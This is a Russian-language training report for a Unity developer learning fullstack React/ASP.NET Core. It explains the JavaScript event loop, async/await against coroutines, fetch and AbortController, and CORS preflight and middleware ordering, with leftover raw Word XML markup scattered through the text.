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Стратегический Отчет: Архитектурная Интеграция и Fullstack Безопасность (Фаза III)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Введение: Эволюция Инженерной Парадигмы</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квалифицированного Unity-инженера в сферу Enterprise Web Development (Fullstack React/.NET) представляет собой фундаментальную трансформацию ментальных моделей, выходящую далеко за рамки синтаксических различий между C# и JavaScript. Данный отчет, разработанный в рамках "Фазы III" стратегического плана акселерации, представляет собой исчерпывающий анализ пятого дня обучения — критического этапа интеграции Frontend и Backend систем. Мы рассматриваем архитектурный ландшафт не как набор изолированных инструментов, а как сложную экосистему, где взаимодействие компонентов регулируется строгими протоколами безопасности и асинхронными потоками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разработчика, привыкшего к детерминированному миру игрового цикла (Game Loop), где каждый кадр является предсказуемым квантом времени, веб-среда предстает как хаотичная, событийно-ориентированная система. В Unity мы управляем временем и состоянием с точностью до миллисекунды внутри метода Update(). В браузере мы отдаем контроль среде выполнения, реагируя на события, возникающие в непредсказуемые моменты времени. Этот отчет деконструирует этот переход, фокусируясь на трех столпах современной веб-архитектуры: модели выполнения (Runtime), сетевом транспорте и безопасности идентичности.</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Цель данного документа — предоставить сеньор-разработчику глубокое понимание механизмов, лежащих в основе интеграции React с ASP.NET Core API. Мы не просто рассмотрим "как" реализовать запрос, но и "почему" архитектура браузера требует таких механизмов, как CORS, Preflight-запросы и HttpOnly Cookies, и как эти концепции соотносятся с привычными паттернами разработки на Unity. Анализ опирается на технические спецификации V8, протоколы HTTP и стандарты безопасности OWASP, обеспечивая академическую точность и инженерную глубину.</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Архитектура Среды Выполнения: От Game Loop к Event Loop</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Фундаментальное различие между Unity и React заключается в модели управления потоком выполнения. Понимание того, как код планируется и исполняется процессором, является ключом к написанию высокопроизводительных приложений на обеих платформах. Для Unity-разработчика, привыкшего к многопоточности C# и предсказуемому циклу PlayerLoop, JavaScript Event Loop требует радикального пересмотра подходов к асинхронности и управлению ресурсами.</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Иллюзия Однопоточности и Истинная Конкурентность</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среде.NET CLR (и, соответственно, в Unity через Mono или IL2CPP) многопоточность является "гражданином первого класса". Разработчик имеет прямой доступ к созданию потоков через System.Threading.Thread, использование пула потоков ThreadPool или абстракций высокого уровня, таких как Task Parallel Library (TPL) и C# Job System. Это позволяет выносить тяжелые вычисления (физика, поиск пути, генерация мешей) на рабочие ядра процессора, оставляя главный поток свободным для рендеринга. В Unity architecture, даже сетевые запросы через UnityWebRequest делегируют передачу данных нативным потокам ОС, позволяя корутинам ожидать завершения без блокировки игры.</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JavaScript в браузере (движок V8) работает иначе. Спецификация языка определяет его как однопоточный. Это означает, что в каждый момент времени в одном контексте (вкладке браузера) может выполняться только одна операция JavaScript. Здесь нет эквивалента Thread.Sleep(), который приостановил бы выполнение потока, не заморозив при этом весь интерфейс. Попытка выполнить длительную синхронную операцию (например, сложный расчет в цикле while) приведет к полной блокировке UI, что эквивалентно бесконечному циклу внутри Update() в Unity, который вешает приложение.</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называть браузер "однопоточным" было бы технически неверно. Браузер — это сложное многопоточное приложение, написанное на C++/Rust. Когда JavaScript вызывает асинхронную функцию, такую как fetch или setTimeout, движок V8 делегирует выполнение этой задачи Web API браузера. Эти API работают на отдельных, фоновых потоках, управляемых самим браузером, а не кодом разработчика. JavaScript-поток освобождается немедленно, продолжая выполнение следующей строки кода. Когда фоновая операция завершается, Web API помещает callback-функцию в очередь задач, ожидая, пока главный поток освободится для её выполнения.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Сравнительный анализ моделей конкурентности</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(.NET/Mono/IL2CPP)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Browser (V8/JS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следствие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Основной механизм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PlayerLoop (Циклический, кадровый)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Event Loop (Событийный)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 Unity код опрашивает состояние (Polling); в JS код реагирует на события.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Параллелизм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Истинная многопоточность (Task, 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Один поток JS + Web Workers + Web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CPU-интенсивные задачи в JS требуют явного использования Web Workers во избежание фризов.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Блокировка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Синхронный IO блокирует поток, но возможен на Worker Thread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Синхронный IO невозможен (deprecated), вычисления блокируют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 полагается исключительно на неблокирующие асинхронные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Планирование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Строгий порядок: FixedUpdate -&gt; Update -&gt; LateUpdate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Приоритетные очереди: Microtasks vs Macrotasks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Порядок выполнения в JS определяется типом задачи (Promise vs Timeout), а не фазой кадра.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Синхронизация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 Mutex,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 требуется (один поток доступа к памяти)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Отсутствие гонок данных (race conditions) по памяти, но наличие логических гонок асинхронности.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Анатомия Event Loop: Механика Внутренних Очередей</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Event Loop — это оркестратор, который управляет выполнением кода, сбором событий и выполнением подзадач. Его можно сравнить с кастомным менеджером задач в Unity, который обрабатывает очередь делегатов (Action), но с гораздо более сложной системой приоритетов. Понимание этой системы критично для предсказания порядка выполнения кода, что является аналогом понимания "Script Execution Order" в Unity.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Внутри Event Loop существуют две критически важные очереди, различие между которыми часто упускается: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Macrotask Queue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Очередь задач) и </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microtask Queue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Очередь микрозадач).</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Macrotasks (Task Queue):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Сюда попадают колбэки от setTimeout, setInterval, событий ввода/вывода (I/O), UI-рендеринга.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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похоже на Coroutine, которая возвращает управление и ожидает следующего вызова. Движок берет </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">одну</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> задачу из этой очереди, выполняет её до конца, а затем проверяет, нужно ли обновить рендеринг страницы.</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Microtasks (Job Queue):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Сюда попадают колбэки от Promise (.then, .catch, finally), async/await, и MutationObserver.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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напоминает немедленное продолжение выполнения (Task.ContinueWith в том же контексте).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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Приоритет:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> После выполнения </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">каждой</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> макрозадачи (и перед рендерингом), Event Loop обрабатывает </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">всю</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> очередь микрозадач до тех пор, пока она не станет пустой. Если микрозадача добавляет новую микрозадачу, она также будет выполнена в этом же цикле.</w:t>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Риск:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Бесконечная рекурсия микрозадач может полностью заблокировать Event Loop, не давая браузеру перерисовать страницу. Это "зависание" отличается от бесконечного while, но результат для пользователя идентичен.</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Сценарий выполнения кода:</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Рассмотрим пример кода на JS, который демонстрирует приоритеты, и проведем параллель с Unity.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 Start'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Синхронный код</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 Timeout'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Macrotask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color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.resolve().then(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 Promise'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Microtask</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 End'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Синхронный код</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Порядок вывода:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Start -&gt; 4. End -&gt; 3. Promise -&gt; 2. Timeout.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Почему Promise выполняется раньше setTimeout, хотя таймер установлен на 0мс? Потому что промисы — это микрозадачи. После завершения синхронного блока (завершения текущей макрозадачи "выполнение скрипта"), движок обязан очистить очередь микрозадач </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">перед</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> тем, как взять следующую макрозадачу (таймер). Для Unity-разработчика это аналогично тому, как логика в Update() выполняется перед LateUpdate() или перед рендерингом кадра. Понимание этого нюанса предотвращает множество ошибок, связанных с состоянием гонки (race conditions) при обновлении UI.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Асинхронный Поток: Coroutines против Promises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Coroutine к Promise является, пожалуй, самым важным ментальным сдвигом. В Unity корутина — это итератор (IEnumerator), который сохраняет состояние выполнения. Механизм yield return приостанавливает функцию и передает управление движку Unity, который возобновляет выполнение в следующем кадре (или после завершения асинхронной операции, как UnityWebRequest).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современном JavaScript синтаксис async/await позволяет писать асинхронный код, который выглядит как синхронный, что очень напоминает линейную структуру корутин. Однако под капотом async функция всегда возвращает Promise — объект, представляющий будущее значение.</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Подход Unity Coroutine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IEnumerator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FetchData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(UnityWebRequest www = UnityWebRequest.Get(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"https://api.example.com"</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www.SendWebRequest();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Приостановка выполнения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(www.result == UnityWebRequest.Result.Success) {</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">             Process(www.downloadHandler.text);</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        }</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">}</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Подход React/JS Async/Await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fetchData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response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fetch(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"https://api.example.com"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Приостановка, возврат управления Event Loop</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(response.ok)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data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response.json();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Еще одна асинхронная операция (чтение потока)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.log(data);</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">        }</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f1f1f"/>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"Network Error:"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, error);</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">}</w:t>
        <w:br w:type="textWrapping"/>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Критическое различие заключается в обработке ошибок. В Unity внутри корутины исключения могут "проглатываться" или требовать явной проверки свойств isNetworkError / isHttpError. В JavaScript промисы имеют встроенный канал для ошибок (.catch), и async/await позволяет использовать стандартные блоки try/catch, делая обработку сетевых сбоев более естественной и похожей на синхронный C# код.</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Сетевая Архитектура: UnityWebRequest против Fetch API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Второй столп интеграции — это механизм, посредством которого клиентское приложение общается с внешним миром. Здесь мы сталкиваемся с фундаментальным различием между нативным приложением (Unity Build) и браузерным приложением (React App), работающим в песочнице.</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Песочница Браузера и Ограничения Среды</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UnityWebRequest (UWR) функционирует в контексте нативного приложения. Когда игра скомпилирована под Windows, iOS или Android, она имеет прямой доступ к сетевому стеку операционной системы. Она может открывать сырые TCP/UDP сокеты, использовать любые порты и обращаться к любым серверам (при условии разрешения файервола ОС). В этом контексте нет понятия "Same-Origin Policy" в том виде, в каком оно существует в вебе.</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Fetch API работает внутри строгой песочницы браузера. Это высокоуровневый API, который не дает прямого доступа к TCP-соединению. Он жестко ограничен политиками безопасности. Скрипт, загруженный с одного домена (Origin), по умолчанию не имеет права читать данные с другого домена. Это ограничение, известное как SOP (Same-Origin Policy), является главным препятствием для разработчиков, переходящих с десктопной разработки в веб. В Unity вы просто делаете запрос; в браузере вы должны "попросить разрешения" у сервера на чтение ответа.</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Уровни Абстракции: Императивный vs Функциональный</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UnityWebRequest построен на императивной модели и паттерне "Dispatcher". Вы создаете объект запроса, настраиваете его, прикрепляете к нему компоненты DownloadHandler (для обработки входящих данных) и UploadHandler (для отправки), а затем запускаете процесс. Это объектно-ориентированный подход, где запрос — это агент, выполняющий работу и хранящий своё состояние.</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Fetch API следует функциональной парадигме и модели потоков (Streams). Вызов fetch возвращает промис, который разрешается в объект Response сразу после получения заголовков ответа (Time To First Byte), даже если тело ответа еще не загружено. Тело ответа представляет собой ReadableStream. Вы должны явно вызвать метод преобразования (например, .json() или .blob()), который сам по себе является асинхронным, так как он читает поток до конца.</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Важное отличие в семантике ошибок:</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UnityWebRequest флаги isNetworkError (ошибка DNS, сокета) и isHttpError (статус 4xx/5xx) разделены, но часто обрабатываются вместе.</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fetch промис отклоняется (reject) только в случае сетевого сбоя (невозможность установить соединение). Если сервер вернул 500 Internal Server Error, fetch считает это успешным завершением HTTP-транзакции. Объект response будет иметь свойство ok: false и status: 500. Разработчик React обязан вручную проверять response.ok, иначе код попытается распарсить HTML-страницу с ошибкой как JSON, что приведет к исключению синтаксиса на этапе обработки данных, а не запроса.23</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Паттерны Отмены Запросов: AbortController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управление жизненным циклом запросов часто привязано к жизненному циклу GameObject. Если объект уничтожается (OnDestroy), корутина, запущенная на нем, останавливается. Однако сам UnityWebRequest может продолжать висеть в памяти или в нативном потоке, если его явно не уничтожить методом .Dispose() или .Abort(). В Unity мы часто используем проверку на null или токены отмены (в UniTask), чтобы избежать ошибок при возврате данных в уничтоженный объект.</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React компоненты монтируются и размонтируются динамически (например, при навигации пользователя). Если сетевой запрос завершается после того, как компонент был удален из DOM, попытка обновить состояние этого компонента (setState) приведет к утечке памяти или ошибке. Стандартным решением является </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AbortController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AbortController создает объект signal, который передается в fetch. Если компонент размонтируется, мы вызываем controller.abort(). Это посылает сигнал браузеру немедленно прервать сетевое соединение (закрыть сокет) и отклонить промис с ошибкой типа AbortError.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Паттерн использования в useEffect</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">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controller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AbortController();</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">    fetch(url,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signal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: controller.signal })</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">       .then(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data =&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:shd w:fill="f0f4f9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> setData(data))</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">       .catch(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err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(err.name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'AbortError'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'Запрос отменен'</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setError(err);</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Функция очистки (аналог OnDisable/OnDestroy)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controller.abort(); </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">}, [url]);</w:t>
        <w:br w:type="textWrapping"/>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паттерн архитектурно идентичен использованию CancellationToken в асинхронном C# коде, гарантируя, что "мертвые" компоненты не потребляют ресурсы и не вызывают побочных эффектов.</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Невидимая Стена CORS: Протоколы Безопасности Браузера</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CORS (Cross-Origin Resource Sharing) — это тема, вызывающая наибольшее количество фрустраций у разработчиков, мигрирующих с нативных платформ. В контексте десктопной игры, если вы хотите отправить запрос на сервер, вы просто отправляете его. В веб-контексте браузер выступает в роли строгого посредника, который проверяет каждое действие скрипта на соответствие политикам безопасности.</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Same-Origin Policy (SOP): Основа Доверия</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SOP — это фундаментальный механизм безопасности. Он гласит, что скрипты, загруженные с одного источника (Origin), не могут получать доступ к ресурсам другого источника без явного разрешения. "Источник" определяется кортежем: {Протокол, Хост, Порт}.</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http://localhost:3000 (React) и http://localhost:5000 (ASP.NET API) — это </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">разные</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> источники, так как отличаются порты.</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Браузер предполагает, что любой внешний ресурс может содержать конфиденциальные данные пользователя (например, банковский интерфейс). Если бы SOP не существовало, злоумышленник мог бы создать сайт, который в фоновом режиме делает AJAX-запросы к bank.com (где пользователь залогинен) и читает баланс счета. SOP блокирует чтение ответа по умолчанию.</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Механика Preflight-запросов (OPTIONS)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Unity-клиент подключается к серверу, происходит TCP-рукопожатие (Handshake). В вебе существует аналогичный концепт на уровне HTTP для кросс-доменных запросов — </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preflight Request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Запросы делятся на "Простые" (Simple) и "Сложные" (Complex). Простые запросы (GET/POST со стандартными заголовками) могут отправляться сразу. Однако современные SPA приложения практически всегда используют Сложные запросы. Критерии сложности:</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Использование метода PUT, DELETE или PATCH.</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Наличие кастомных заголовков, например, Authorization (для JWT) или X-API-Key.</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Тип контента application/json.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React-приложение пытается отправить такой запрос, браузер автоматически приостанавливает его и отправляет предварительный запрос методом OPTIONS.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запрос спрашивает сервер: "Я — скрипт с источника А. Я хочу отправить тебе запрос методом POST с заголовком Authorization. Ты разрешаешь это?".28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Сервер должен ответить статусом 200 или 204 и специальными заголовками:</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Access-Control-Allow-Origin: http://localhost:3000</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Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT</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Access-Control-Allow-Headers: Authorization, Content-Type</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Access-Control-Allow-Credentials: true (если используются куки).</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Только после получения этого "разрешения" браузер отправляет фактический запрос с данными. Если сервер не настроен на обработку OPTIONS или не возвращает нужные заголовки, браузер блокирует запрос, и в консоли появляется ошибка CORS. Важно понимать: запрос </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">может</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> дойти до сервера и даже выполниться, но браузер </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">скроет</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ответ от JavaScript кода.</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Конфигурация Middleware в ASP.NET Core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создающего свой бэкенд на.NET, критически важно понимание порядка Middleware (промежуточного ПО) в Program.cs. ASP.NET Core обрабатывает запрос как конвейер.</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Распространенная ошибка: Размещение app.UseCors() после app.UseAuthorization().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Последствие: Браузер отправляет Preflight (OPTIONS) запрос. Этот запрос не содержит токена авторизации (так как браузер еще не знает, можно ли его отправлять). Middleware авторизации видит запрос к защищенному ресурсу без токена и возвращает 401 Unauthorized. Браузер получает 401 на Preflight и блокирует основной запрос с ошибкой CORS (хотя проблема была в авторизации).</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Правильный порядок конвейера:</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Routing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (app.UseRouting): Определение эндпоинта.</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CORS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (app.UseCors): Проверка источника и отправка CORS-заголовков. Это должно произойти </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> проверки безопасности пользователя, так как Preflight анонимен.</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(app.UseAuthentication): Проверка токена (кто это?).</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Authorization</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans Text" w:cs="Google Sans Text" w:eastAsia="Google Sans Text" w:hAnsi="Google Sans Text"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (app.UseAuthorization): Проверка прав (можно ли ему это?).</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Endpoints</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
